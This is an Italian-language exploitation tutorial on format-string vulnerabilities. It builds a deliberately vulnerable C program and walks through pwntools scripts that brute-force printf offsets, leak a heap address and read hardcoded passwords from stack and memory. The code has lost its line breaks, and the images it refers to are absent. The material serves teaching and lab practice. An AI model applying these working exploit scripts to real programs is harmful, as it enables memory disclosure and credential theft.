from pwn import*p =process('./fs-read')payload =f"%11$s|||||".encode()payload +=p64(0x00400000)p.sendline(payload)log.info(p.clean())
L'offset è 11 perché impostando diversi A e brute-forzando con un ciclo di offset da 0 a 50 si è scoperto che all'offset 11 e con 5 caratteri extra (pipe | nel nostro caso), è possibile controllare un indirizzo completo.
Ho usato %11$p con padding fino a che l'indirizzo fosse tutto 0x4141414141414141
Il payload della format string è PRIMA dell'indirizzo perché il printf smette di leggere a un byte nullo, quindi se inviamo l'indirizzo e poi la format string, il printf non raggiungerà mai la format string poiché un byte nullo sarà trovato prima
L'indirizzo selezionato è 0x00400000 perché è dove inizia il binario (no PIE)
Leggi le password
#include<stdio.h>#include<string.h>char bss_password[20] ="hardcodedPassBSS"; // Password in BSSintmain() {char stack_password[20] ="secretStackPass"; // Password in stackchar input1[20], input2[20];printf("Enter first password: ");scanf("%19s", input1);printf("Enter second password: ");scanf("%19s", input2);// Vulnerable printfprintf(input1);printf("\n");// Check both passwordsif (strcmp(input1, stack_password)==0&&strcmp(input2, bss_password)==0) {printf("Access Granted.\n");} else {printf("Access Denied.\n");}return0;}
Compilalo con:
clang-ofs-readfs-read.c-Wno-format-security
Leggi dallo stack
La stack_password sarà memorizzata nello stack perché è una variabile locale, quindi è sufficiente abusare di printf per mostrare il contenuto dello stack. Questo è un exploit per BF le prime 100 posizioni per leakare le password dallo stack:
from pwn import*for i inrange(100):print(f"Try: {i}")payload =f"%{i}$s\na".encode()p =process("./fs-read")p.sendline(payload)output = p.clean()print(output)p.close()
Nell'immagine è possibile vedere che possiamo leakare la password dallo stack nella posizione 10:
Leggere i dati
Eseguendo lo stesso exploit ma con %p invece di %s è possibile leakare un indirizzo della heap dallo stack a %25$p. Inoltre, confrontando l'indirizzo leakato (0xaaaab7030894) con la posizione della password in memoria in quel processo possiamo ottenere la differenza degli indirizzi:
Ora è il momento di trovare come controllare 1 indirizzo nello stack per accedervi dalla seconda vulnerabilità della format string:
from pwn import*defleak_heap(p):p.sendlineafter(b"first password:", b"%5$p")p.recvline()response = p.recvline().strip()[2:] #Remove new line and "0x" prefixreturnint(response, 16)for i inrange(30):p =process("./fs-read")heap_leak_addr =leak_heap(p)print(f"Leaked heap: {hex(heap_leak_addr)}")password_addr = heap_leak_addr -0x126aprint(f"Try: {i}")payload =f"%{i}$p|||".encode()payload +=b"AAAAAAAA"p.sendline(payload)output = p.clean()print(output.decode("utf-8"))p.close()
E è possibile vedere che nel try 14 con il passaggio utilizzato possiamo controllare un indirizzo:
Exploit
from pwn import*p =process("./fs-read")defleak_heap(p):# At offset 25 there is a heap leakp.sendlineafter(b"first password:", b"%25$p")p.recvline()response = p.recvline().strip()[2:] #Remove new line and "0x" prefixreturnint(response, 16)heap_leak_addr =leak_heap(p)print(f"Leaked heap: {hex(heap_leak_addr)}")# Offset calculated from the leaked position to the possition of the pass in memorypassword_addr = heap_leak_addr +0x1f7bcprint(f"Calculated address is: {hex(password_addr)}")# At offset 14 we can control the addres, so use %s to read the string from that addresspayload =f"%14$s|||".encode()payload +=p64(password_addr)p.sendline(payload)output = p.clean()print(output)p.close()